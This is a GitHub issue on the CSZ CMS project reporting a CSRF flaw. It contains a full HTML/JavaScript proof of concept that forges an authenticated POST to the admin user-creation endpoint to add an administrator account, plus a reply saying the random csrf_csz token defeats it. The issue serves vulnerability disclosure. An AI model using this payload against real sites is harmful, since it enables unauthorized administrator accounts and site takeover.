cskaza / cszcms

Open Source CMS (Content Management System) with Codeigniter and Bootstrap.

Home Page:https://www.cszcms.com



There is a CSRF vulnerability that can be used to add an administrator account

RitaWWang opened this issue · comments

While an administrator is logged in, open the following page.
PoC:
one.html — adds an administrator

  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      // CSRF PoC as submitted in the report: from a page the logged-in
      // administrator visits, it replays a captured POST to the
      // admin/users/new/add endpoint. withCredentials = true makes the
      // browser attach the victim's session cookie, which is what turns a
      // cross-site request into an authenticated one.
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost\/cszcms-master\/admin\/users\/new\/add", true);
        // Boundary is hard-coded to match the hand-built multipart body below.
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarykobVwTQR7Qxut2B0");
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
        xhr.withCredentials = true;
        // NOTE(review): the csrf_csz field is a fixed value copied from one
        // captured request. The maintainer reply states the token is
        // regenerated on the next submit, so a correctly implemented
        // server-side check rejects this replay; the request only succeeds if
        // token validation is missing or a stale token is accepted. That is
        // the server-side behaviour to verify, not the page itself.
        var body = "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"csrf_csz\"\r\n" + 
          "\r\n" + 
          "f34972c37ae66af1cf3355b95a25e347\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"name\"\r\n" + 
          "\r\n" + 
          "test3\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"email\"\r\n" + 
          "\r\n" + 
          "test3@test3.com\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"password\"\r\n" + 
          "\r\n" + 
          "test3\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"con_password\"\r\n" + 
          "\r\n" + 
          "test3\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          // group=1 / active=1 are the values from the captured form; what
          // group 1 maps to is not shown here (presumably the admin group).
          "Content-Disposition: form-data; name=\"group\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"active\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"first_name\"\r\n" + 
          "\r\n" + 
          "te\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"last_name\"\r\n" + 
          "\r\n" + 
          "st\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"year\"\r\n" + 
          "\r\n" + 
          "1929\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"month\"\r\n" + 
          "\r\n" + 
          "02\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"day\"\r\n" + 
          "\r\n" + 
          "02\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"gender\"\r\n" + 
          "\r\n" + 
          "male\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"address\"\r\n" + 
          "\r\n" + 
          "123\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"phone\"\r\n" + 
          "\r\n" + 
          "15826597895\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          // Empty file part: mirrors the original form's upload field so the
          // server sees the same field set as a real submission.
          "Content-Disposition: form-data; name=\"file_upload\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Save\r\n" + 
          "------WebKitFormBoundarykobVwTQR7Qxut2B0--\r\n";
        // Copy the string into a byte array one char at a time and send it as
        // a Blob so the body goes out verbatim; charCodeAt keeps only the low
        // 8 bits per element, which is fine because the body is plain ASCII.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>```

This does not work at all, because you don't know the csrf_csz key on the next submit; it's random.